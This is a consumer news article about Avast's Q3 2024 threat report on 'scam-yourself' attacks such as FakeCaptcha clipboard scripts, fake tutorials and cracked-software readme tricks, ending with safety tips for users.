Imagine someone handing you a gun and asking you to shoot your own foot for a handsome reward. Will you do it? Most unlikely. However, this is exactly what is happening in cyberspace. One of the most alarming trends is the rise of 'scam-yourself attacks'—an advanced social engineering tactic that tricks users into compromising their own systems.
While various scams continued to dominate the September quarter, other serious threats—including malvertising, ransomware, droppers, and data-stealing malware—also surged ahead. Many of these threats remain closely linked to scams, underscoring the relentless evolution of cybercriminal tactics.
In its Gen Q3/2024 Threat Report, security services-provider Avast says in the September quarter alone, it protected over 2mn (million) users from a variant called FakeCaptcha, which mimics CAPTCHA (completely automated public Turing test to tell computers and humans apart) prompts to deliver malware. "With a staggering 614% increase of these scam-yourself attacks quarter-over-quarter, social engineering, psychological manipulation tactics, continues to be one of the most dangerous tools in the cybercriminal arsenal."
"Data stealing malware also increased on mobile devices in the third quarter (Q3) of 2024. Financial data theft by banking malware saw a 60% surge, with attacks like Rocinante targeting users in Brazil, while new threats like TrickMo and Octo2 emerged in Europe. Spyware also rose sharply, with a 166% spike driven by NGate, an advanced spyware targeting NFC data for ATM withdrawals. A common denominator for the main mobile threats seen this quarter is their delivery via malicious SMS messages," Avast says.
As we are witnessing, the landscape of cyberattacks continues to evolve or become more dangerous for a common end user. Gone are the days when malware simply hid in a suspicious email attachment or shady download.
Avast says attackers are now using your curiosity and urgency to fix an issue against you. "They have weaponised what seem like harmless instructions to lure you in, and by the time you realise what is happening, it is already too late. Whether it is through seemingly helpful tutorials or fake update prompts, cybercriminals are making you their accomplice."
Many users (still) love to download and install cracked or pirated software or apps on their devices. These files are usually shared in a zip format (a smaller file size that retains originality after unzipping it). When the file is unzipped, you will find a few other files, including one 'readme.txt', which is supposed to contain 'instructions' to use the cracked software. The last line in the readme file is "Disable your antivirus for this software to work properly." But, when you do that, it becomes quite easy for the malware to get installed on a device or system, where you only have left the door open without the sentry (antivirus).
Another trick in the cybercriminals' playbook involves video tutorials. The video walks you through the process of installing software, but when you click the link in the comments to download it, you are downloading malware instead. What started as a guide to help you ends with your device compromised. The worst part? You are the one who clicked, copied, and executed the threat.
Similar is the case of several 'fix-it' tutorials or fake updates available on the web. However, many of these are fake tutorials that mislead you into performing steps that ultimately compromise your own devices. Or you may be prompted to download malware under the guise of updating your software or device driver.
Many websites want to ensure the user is a human, not a bot. So how do they do it? They use the CAPTCHA service. It means the user needs to tick the box next to "I'm not a robot". And nobody thinks twice before clicking on the box. Cybercriminals know this and created FakeCaptcha—a variant of ClickFix—designed to resemble a real CAPTCHA, tricking you into following steps that lead straight to infection.
After clicking 'I am not a robot', a script is quietly copied to your clipboard, and you are prompted to run it. Following these instructions results in malware silently taking over your system. "The CAPTCHA looks real, but the consequences are all too dangerous. What is happening behind the scenes is that the script acts as a dropper—downloading further malware onto your system, often the infamous Lumma Stealer, one of the most advanced information stealers out there today," Avast says.
In short, in scam-yourself attacks, the users may unintentionally take actions that either compromise their own security or lead them to unknowingly assist the attacker in perpetrating fraud. It often happens because the user fails to recognise the warning signs of a scam or is tricked into thinking the attack is legitimate.
According to Avast, scam-yourself attacks have become a cybercriminal's dream in a world where we rely on quick fixes and familiar online prompts. Users unknowingly follow instructions that do the attackers' bidding for them, whether through fake CAPTCHAs, misleading YouTube tutorials, or cleverly disguised readme files.
"What is more troubling is how effortlessly these scams blend into our daily digital lives. We have grown so used to CAPTCHAs and quick-fix guides that we often forget to stop and question them. Also, almost every application needs to be up-to-date and if it is not, users commonly see screens and dialogues prompting the (mandatory) update. In the hands of cybercriminals, our trust in these familiar formats becomes their most powerful weapon,' Avast says.
As the scam-yourself attacks evolve, one constant remains: these campaigns thrive on user deception and manipulation. The question is not whether these fake tutorials will persist but how we will recognise and navigate them before it is too late.
Here are a few suggestions to protect you from shooting yourself in the foot!
1. Be sceptical: Avoid clicking on links or opening attachments from unfamiliar sources.
2. Use strong, unique passwords: Ensure you use strong, unique passwords for all online accounts. Enable multi-factor authentication (MFA) wherever possible for an extra layer of protection.
3. Use antivirus and anti-phishing tools: Keep your device's security software up to date and use anti-phishing tools in your browser to help block fraudulent websites and malicious links.
4. Avoid remote access requests: Be cautious if anyone asks to remotely access your computer or device, particularly if they claim to be from a technical support company or government entity. Legitimate organisations will never call you seeking device access.
5. Trust your instincts: If something feels off or seems too good to be true, it is worth taking a step back to reconsider the situation. Scammers often rely on emotional manipulation to rush you into decisions, so always trust your gut and think critically before proceeding.
By staying aware of common scams and practising caution when interacting online, you can significantly reduce the risk of becoming a victim of scam-yourself attacks.
Stay Alert, Stay Safe!